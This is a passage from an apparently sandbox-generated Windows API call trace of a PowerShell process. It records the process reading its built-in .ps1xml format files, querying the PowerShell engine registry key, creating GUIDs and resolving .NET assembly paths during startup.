nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1 [0054.176] GetLastError () returned 0x0 [0054.176] SetErrorMode (uMode=0x1) returned 0x1 [0054.176] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x2ce480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0054.176] GetLastError () returned 0x0 [0054.176] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce8d8 | out: phkResult=0x2ce8d8*=0x31c) returned 0x0 [0054.176] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x2ce920, lpData=0x0, lpcbData=0x2ce91c*=0x0 | out: lpType=0x2ce920*=0x1, lpData=0x0, lpcbData=0x2ce91c*=0x56) returned 0x0 [0054.176] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x2ce920, lpData=0x3b8428, lpcbData=0x2ce91c*=0x56 | out: lpType=0x2ce920*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x2ce91c*=0x56) returned 0x0 [0054.177] RegCloseKey (hKey=0x31c) returned 0x0 [0054.177] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x2ce480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0054.177] GetLastError () returned 0x0 [0054.177] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x2ce414, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0054.177] GetLastError () returned 0x0 [0054.201] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x96cf30af, Data2=0x91f0, Data3=0x436a, Data4=([0]=0xad, [1]=0xb8, [2]=0x39, [3]=0x44, [4]=0xb0, [5]=0x67, [6]=0xf9, [7]=0xb2))) returned 0x0 [0054.216] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x790cfcda, Data2=0xd67c, Data3=0x41db, Data4=([0]=0x97, [1]=0x72, [2]=0x45, [3]=0x3e, [4]=0xae, [5]=0xdf, [6]=0xa1, [7]=0xc4))) returned 0x0 [0054.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2ce3ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0054.217] GetLastError () returned 0x0 [0054.217] SetErrorMode (uMode=0x1) returned 0x1 [0054.218] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x31c [0054.218] GetLastError () returned 0x0 [0054.218] GetFileType (hFile=0x31c) returned 0x1 [0054.218] SetErrorMode (uMode=0x1) returned 0x1 [0054.218] GetFileType (hFile=0x31c) returned 0x1 [0054.218] ReadFile (in: hFile=0x31c, lpBuffer=0x2dd29ac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2dd29ac*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.220] GetLastError () returned 0x0 [0054.220] ReadFile (in: hFile=0x31c, lpBuffer=0x2dd29ac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2dd29ac*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.221] GetLastError () returned 0x0 [0054.221] ReadFile (in: hFile=0x31c, lpBuffer=0x2dd29ac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2dd29ac*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.221] GetLastError () returned 0x0 [0054.221] ReadFile (in: hFile=0x31c, lpBuffer=0x2dd29ac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2dd29ac*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.221] GetLastError () returned 0x0 [0054.221] ReadFile (in: hFile=0x31c, lpBuffer=0x2dd29ac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2dd29ac*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.222] GetLastError () returned 0x0 [0054.223] ReadFile (in: hFile=0x31c, lpBuffer=0x2dd29ac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2dd29ac*, lpNumberOfBytesRead=0x2ce954*=0xfb2, lpOverlapped=0x0) returned 1 [0054.223] GetLastError () returned 0x0 [0054.223] ReadFile (in: hFile=0x31c, lpBuffer=0x2dd20fe, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2dd20fe*, lpNumberOfBytesRead=0x2ce954*=0x0, lpOverlapped=0x0) returned 1 [0054.223] GetLastError () returned 0x0 [0054.223] ReadFile (in: hFile=0x31c, lpBuffer=0x2dd29ac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2dd29ac*, lpNumberOfBytesRead=0x2ce954*=0x0, lpOverlapped=0x0) returned 1 [0054.223] GetLastError () returned 0x0 [0054.223] CloseHandle (hObject=0x31c) returned 1 [0054.223] GetLastError () returned 0x0 [0054.223] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2ce4b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0054.223] GetLastError () returned 0x0 [0054.223] SetErrorMode (uMode=0x1) returned 0x1 [0054.223] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2df323c | out: lpFileInformation=0x2df323c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1f4ab5, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1f4ab5, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd374b67c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1 [0054.223] GetLastError () returned 0x0 [0054.223] SetErrorMode (uMode=0x1) returned 0x1 [0054.223] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2ce480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0054.223] GetLastError () returned 0x0 [0054.223] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce8d8 | out: phkResult=0x2ce8d8*=0x31c) returned 0x0 [0054.224] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x2ce920, lpData=0x0, lpcbData=0x2ce91c*=0x0 | out: lpType=0x2ce920*=0x1, lpData=0x0, lpcbData=0x2ce91c*=0x56) returned 0x0 [0054.224] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x2ce920, lpData=0x3b8428, lpcbData=0x2ce91c*=0x56 | out: lpType=0x2ce920*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x2ce91c*=0x56) returned 0x0 [0054.224] RegCloseKey (hKey=0x31c) returned 0x0 [0054.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2ce480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0054.224] GetLastError () returned 0x0 [0054.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2ce414, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0054.224] GetLastError () returned 0x0 [0054.226] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0xa172e0ea, Data2=0xa73c, Data3=0x4b0c, Data4=([0]=0x9a, [1]=0xd5, [2]=0x9c, [3]=0xb0, [4]=0x35, [5]=0x4b, [6]=0x69, [7]=0xcf))) returned 0x0 [0054.232] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x5b81e2f4, Data2=0x3aa7, Data3=0x45b3, Data4=([0]=0xa4, [1]=0x89, [2]=0xd3, [3]=0xb3, [4]=0x84, [5]=0x18, [6]=0xc7, [7]=0x4))) returned 0x0 [0054.238] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0xa8522128, Data2=0x1464, Data3=0x4ae9, Data4=([0]=0xa3, [1]=0xec, [2]=0x28, [3]=0xf7, [4]=0x20, [5]=0xbb, [6]=0xcc, [7]=0x1d))) returned 0x0 [0054.238] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x569d1792, Data2=0x308b, Data3=0x4088, Data4=([0]=0xab, [1]=0x78, [2]=0xc5, [3]=0xd7, [4]=0x95, [5]=0x47, [6]=0x96, [7]=0xc2))) returned 0x0 [0054.238] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x80a5ba9f, Data2=0xd3f5, Data3=0x4cf7, Data4=([0]=0x83, [1]=0xd2, [2]=0x93, [3]=0xf0, [4]=0xe0, [5]=0xa9, [6]=0xd8, [7]=0xe5))) returned 0x0 [0054.238] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x7893996, Data2=0x40d3, Data3=0x4f4c, Data4=([0]=0x88, [1]=0xf1, [2]=0x2e, [3]=0x1d, [4]=0xde, [5]=0xa9, [6]=0x6a, [7]=0x17))) returned 0x0 [0054.239] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2ce3ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0054.239] GetLastError () returned 0x0 [0054.239] SetErrorMode (uMode=0x1) returned 0x1 [0054.239] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x31c [0054.239] GetLastError () returned 0x0 [0054.239] GetFileType (hFile=0x31c) returned 0x1 [0054.239] SetErrorMode (uMode=0x1) returned 0x1 [0054.239] GetFileType (hFile=0x31c) returned 0x1 [0054.239] ReadFile (in: hFile=0x31c, lpBuffer=0x2e12be4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2e12be4*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.241] GetLastError () returned 0x0 [0054.242] ReadFile (in: hFile=0x31c, lpBuffer=0x2e12be4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2e12be4*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.242] GetLastError () returned 0x0 [0054.243] ReadFile (in: hFile=0x31c, lpBuffer=0x2e12be4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2e12be4*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.243] GetLastError () returned 0x0 [0054.243] ReadFile (in: hFile=0x31c, lpBuffer=0x2e12be4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2e12be4*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.243] GetLastError () returned 0x0 [0054.244] ReadFile (in: hFile=0x31c, lpBuffer=0x2e12be4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2e12be4*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.244] GetLastError () returned 0x0 [0054.244] ReadFile (in: hFile=0x31c, lpBuffer=0x2e12be4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2e12be4*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.244] GetLastError () returned 0x0 [0054.244] ReadFile (in: hFile=0x31c, lpBuffer=0x2e12be4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2e12be4*, lpNumberOfBytesRead=0x2ce954*=0xaca, lpOverlapped=0x0) returned 1 [0054.244] GetLastError () returned 0x0 [0054.244] ReadFile (in: hFile=0x31c, lpBuffer=0x2e1224e, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2e1224e*, lpNumberOfBytesRead=0x2ce954*=0x0, lpOverlapped=0x0) returned 1 [0054.244] GetLastError () returned 0x0 [0054.244] ReadFile (in: hFile=0x31c, lpBuffer=0x2e12be4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2e12be4*, lpNumberOfBytesRead=0x2ce954*=0x0, lpOverlapped=0x0) returned 1 [0054.244] GetLastError () returned 0x0 [0054.244] CloseHandle (hObject=0x31c) returned 1 [0054.244] GetLastError () returned 0x0 [0054.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2ce4b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0054.244] GetLastError () returned 0x0 [0054.244] SetErrorMode (uMode=0x1) returned 0x1 [0054.244] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2e33be0 | out: lpFileInformation=0x2e33be0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a051ba0, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a051ba0, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2d2d8fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1 [0054.244] GetLastError () returned 0x0 [0054.244] SetErrorMode (uMode=0x1) returned 0x1 [0054.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2ce480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0054.245] GetLastError () returned 0x0 [0054.245] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce8d8 | out: phkResult=0x2ce8d8*=0x31c) returned 0x0 [0054.245] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x2ce920, lpData=0x0, lpcbData=0x2ce91c*=0x0 | out: lpType=0x2ce920*=0x1, lpData=0x0, lpcbData=0x2ce91c*=0x56) returned 0x0 [0054.245] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x2ce920, lpData=0x3b8428, lpcbData=0x2ce91c*=0x56 | out: lpType=0x2ce920*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x2ce91c*=0x56) returned 0x0 [0054.245] RegCloseKey (hKey=0x31c) returned 0x0 [0054.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2ce480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0054.245] GetLastError () returned 0x0 [0054.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2ce414, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0054.245] GetLastError () returned 0x0 [0054.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x2ce144, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3a [0054.260] GetLastError () returned 0x0 [0054.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2ce144, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0054.263] GetLastError () returned 0x57 [0054.271] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x2ce144, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48 [0054.271] GetLastError () returned 0x57 [0054.272] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce144, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.272] GetLastError () returned 0x57 [0054.273] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x2ce144, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0054.273] GetLastError () returned 0x57 [0054.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x2ce144, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52 [0054.274] GetLastError () returned 0x57 [0054.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x2ce144, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74 [0054.276] GetLastError () returned 0x57 [0054.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x2ce144, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0054.277] GetLastError () returned 0x57 [0054.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x2ce144, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60 [0054.278] GetLastError () returned 0x57 [0054.280] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x2ce144, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0054.280] GetLastError () returned 0x57 [0054.281] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x2ce144, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0054.281] GetLastError () returned 0x57 [0054.282] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x2ce144, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0054.282] GetLastError () returned 0x57 [0054.282] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x2ce144, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50 [0054.282] GetLastError () returned 0x57 [0054.283] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x2ce144, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e [0054.283] GetLastError () returned 0x57 [0054.284] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x2ce144, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c [0054.284] GetLastError () returned 0x57 [0054.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x2ce144, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3a [0054.285] GetLastError () returned 0x57 [0054.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2ce144, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0054.285] GetLastError () returned 0x57 [0054.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x2ce144, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48 [0054.285] GetLastError () returned 0x57 [0054.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce144, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.285] GetLastError () returned 0x57 [0054.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.285] GetLastError () returned 0x57 [0054.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce130, lpFilePart=0x0 | out: 